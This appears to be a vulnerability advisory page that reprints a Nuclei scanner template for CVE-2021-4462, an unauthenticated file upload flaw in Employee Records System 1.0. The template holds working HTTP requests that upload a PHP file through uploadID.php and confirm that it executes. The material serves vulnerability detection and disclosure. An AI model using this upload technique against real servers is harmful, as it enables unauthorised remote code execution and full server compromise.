CVE-2021-4462: Employee Records System 1.0 - Unauthenticated File Upload RCE

日期: 2025-12-02 | 影响软件: Employee Records System 1.0 | POC: 已公开

漏洞描述

Employee Records System version 1.0 contains an unrestricted file upload vulnerability in uploadID.php that allows remote unauthenticated attackers to upload arbitrary PHP files and achieve remote code execution.

PoC代码[已公开]

id: CVE-2021-4462

info:
  name: Employee Records System 1.0 - Unauthenticated File Upload RCE
  author: josephttd
  severity: critical
  description: |
    Employee Records System version 1.0 contains an unrestricted file upload vulnerability in uploadID.php that allows remote unauthenticated attackers to upload arbitrary PHP files and achieve remote code execution.
  impact: |
    Unauthenticated attackers can upload arbitrary PHP files via uploadID.php and achieve remote code execution, leading to complete server compromise.
  remediation: |
    Apply security patches or upgrade to a later version of Employee Records System.
  reference:
    - https://www.exploit-db.com/exploits/49596
    - https://www.sourcecodester.com/php/11393/employee-records-system.html
  classification:
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cwe-id: CWE-434
    epss-score: 0.20473
    epss-percentile: 0.95383
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2021,employee-records,fileupload,rce,intrusive,vkev

variables:
  string: "CVE-2021-4462"
  filename: "{{to_lower(rand_base(5))}}.php"

http:
  - raw:
      - |
        POST /dashboard/uploadID.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="employee_ID"; filename="{{filename}}"
        Content-Type: image/png

        <?php echo md5("{{string}}");unlink(__FILE__); ?>
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

      - |
        GET /uploads/employees_ids/{{upload_filename}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: upload_filename
        part: body
        internal: true
        group: 1
        regex:
          - '"upload_filename":"([^"]+)"'

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "{{md5(string)}}")'
        condition: and
# digest: 4a0a00473045022003dbc2dd756132bfe6f4f689947b42443e1d0206c8b6206d0af67887ef1d4091022100fd0811dde2805d6069b9aa96e3234457a8b689b85217f9c1394d1aedd779a1b8:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-4462.yaml

相关漏洞推荐